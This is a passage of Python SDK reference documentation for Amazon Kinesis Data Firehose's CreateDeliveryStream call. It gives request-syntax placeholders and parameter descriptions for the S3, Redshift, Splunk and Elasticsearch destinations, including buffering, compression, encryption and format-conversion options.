'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfiguration': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
]
}
},
SplunkDestinationConfiguration={
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream. This name must be unique per AWS account in the same AWS Region. If the delivery streams are in different accounts or different Regions, you can have multiple delivery streams with the same name.\n
:type DeliveryStreamType: string
:param DeliveryStreamType: The delivery stream type. This parameter can be one of the following values:\n\nDirectPut : Provider applications access the delivery stream directly.\nKinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.\n\n
:type KinesisStreamSourceConfiguration: dict
:param KinesisStreamSourceConfiguration: When a Kinesis data stream is used as the source for the delivery stream, a KinesisStreamSourceConfiguration containing the Kinesis data stream Amazon Resource Name (ARN) and the role ARN for the source stream.\n\nKinesisStreamARN (string) -- [REQUIRED]The ARN of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .\n\nRoleARN (string) -- [REQUIRED]The ARN of the role that provides access to the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .\n\n\n
:type DeliveryStreamEncryptionConfigurationInput: dict
:param DeliveryStreamEncryptionConfigurationInput: Used to specify the type and Amazon Resource Name (ARN) of the KMS key needed for Server-Side Encryption (SSE).\n\nKeyARN (string) --If you set KeyType to CUSTOMER_MANAGED_CMK , you must specify the Amazon Resource Name (ARN) of the CMK. If you set KeyType to AWS_OWNED_CMK , Kinesis Data Firehose uses a service-account CMK.\n\nKeyType (string) -- [REQUIRED]Indicates the type of customer master key (CMK) to use for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) . When you invoke CreateDeliveryStream or StartDeliveryStreamEncryption with KeyType set to CUSTOMER_MANAGED_CMK, Kinesis Data Firehose invokes the Amazon KMS operation CreateGrant to create a grant that allows the Kinesis Data Firehose service to use the customer managed CMK to perform encryption and decryption. Kinesis Data Firehose manages that grant.\nWhen you invoke StartDeliveryStreamEncryption to change the CMK for a delivery stream that is encrypted with a customer managed CMK, Kinesis Data Firehose schedules the grant it had on the old CMK for retirement.\nYou can use a CMK of type CUSTOMER_MANAGED_CMK to encrypt up to 500 delivery streams. If a CreateDeliveryStream or StartDeliveryStreamEncryption operation exceeds this limit, Kinesis Data Firehose throws a LimitExceededException .\n\nWarning\nTo encrypt your delivery stream, use symmetric CMKs. Kinesis Data Firehose doesn\'t support asymmetric CMKs. For information about symmetric and asymmetric CMKs, see About Symmetric and Asymmetric CMKs in the AWS Key Management Service developer guide.\n\n\n\n
:type S3DestinationConfiguration: dict
:param S3DestinationConfiguration: [Deprecated] The destination in Amazon S3. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. 
If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ExtendedS3DestinationConfiguration: dict
:param ExtendedS3DestinationConfiguration: The destination in Amazon S3. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupConfiguration (dict) --The configuration for backup in Amazon S3.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. 
You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nDataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.\n\nSchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.\n\nRoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.\n\nCatalogId (string) --The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.\n\nDatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.\n\nTableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.\n\nRegion (string) --If you don\'t specify an AWS Region, the default is the current Region.\n\nVersionId (string) --Specifies the table version for the output data schema. 
If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.\n\n\n\nInputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.\n\nDeserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.\n\nOpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.\n\nConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is 'a.b', you can define the column name to be 'a_b' when using this option.\nThe default is false .\n\nCaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.\n\nColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {'ts': 'timestamp'} to map this key to a column named ts .\n\n(string) --\n(string) --\n\n\n\n\n\n\nHiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. 
Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.\n\nTimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.\n\n(string) --\n\n\n\n\n\n\n\n\nOutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.\n\nSerializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.\n\nParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nPageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.\n\nCompression (string) --The compression code to use over data blocks. 
The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.\n\nEnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.\n\nMaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.\n\nWriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .\n\n\n\nOrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .\n\nStripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nRowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.\n\nEnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .\n\nPaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.\nFor the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. 
In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.\nKinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .\n\nCompression (string) --The compression code to use over data blocks. The default is SNAPPY .\n\nBloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .\n\n(string) --\n\n\nBloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.\n\nDictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.\n\nFormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .\n\n\n\n\n\n\n\nEnabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.\n\n\n\n\n
:type RedshiftDestinationConfiguration: dict
:param RedshiftDestinationConfiguration: The destination in Amazon Redshift. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nClusterJDBCURL (string) -- [REQUIRED]The database connection string.\n\nCopyCommand (dict) -- [REQUIRED]The COPY command.\n\nDataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.\n\nDataTableColumns (string) --A comma-separated list of column names.\n\nCopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the 'Optional Parameters' section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:\n\ndelimiter \'\\t\' lzop; - fields are delimited with 't' (TAB character) and compressed using lzop.delimiter \'|\' - fields are delimited with '|' (this is the default delimiter).\ndelimiter \'|\' escape - the delimiter should be escaped.\nfixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.\nJSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.\n\nFor more examples, see Amazon Redshift COPY command examples .\n\n\n\nUsername (string) -- [REQUIRED]The name of the user.\n\nPassword (string) -- [REQUIRED]The user password.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).\n\nDurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). 
Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.\n\n\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the intermediate Amazon S3 location from which Amazon Redshift obtains data. Restrictions are described in the topic for CreateDeliveryStream .\nThe compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationConfiguration.S3Configuration because the Amazon Redshift COPY operation that reads from the S3 bucket doesn\'t support these compression formats.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. 
For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. 
This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupConfiguration (dict) --The configuration for backup in Amazon S3.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. 
This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. 
This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ElasticsearchDestinationConfiguration: dict
:param ElasticsearchDestinationConfiguration: The destination in Amazon ES. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nDomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\nSpecify either ClusterEndpoint or DomainARN .\n\nClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.\n\nIndexName (string) -- [REQUIRED]The Elasticsearch index name.\n\nTypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during run time.\nFor Elasticsearch 7.x, don\'t specify a TypeName .\n\nIndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to the IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . The default value is OneDay .\n\nBufferingHints (dict) --The buffering options. If no value is specified, the default values for ElasticsearchBufferingHints are used.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. 
The default value is 300 (5 minutes).\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.\n\n\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).\n\nDurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When it is set to FailedDocumentsOnly , Kinesis Data Firehose writes any documents that could not be indexed to the configured Amazon S3 destination, with elasticsearch-failed/ appended to the key prefix. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents with elasticsearch-failed/ appended to the prefix. For more information, see Amazon S3 Backup for the Amazon ES Destination . Default value is FailedDocumentsOnly .\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. 
For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for 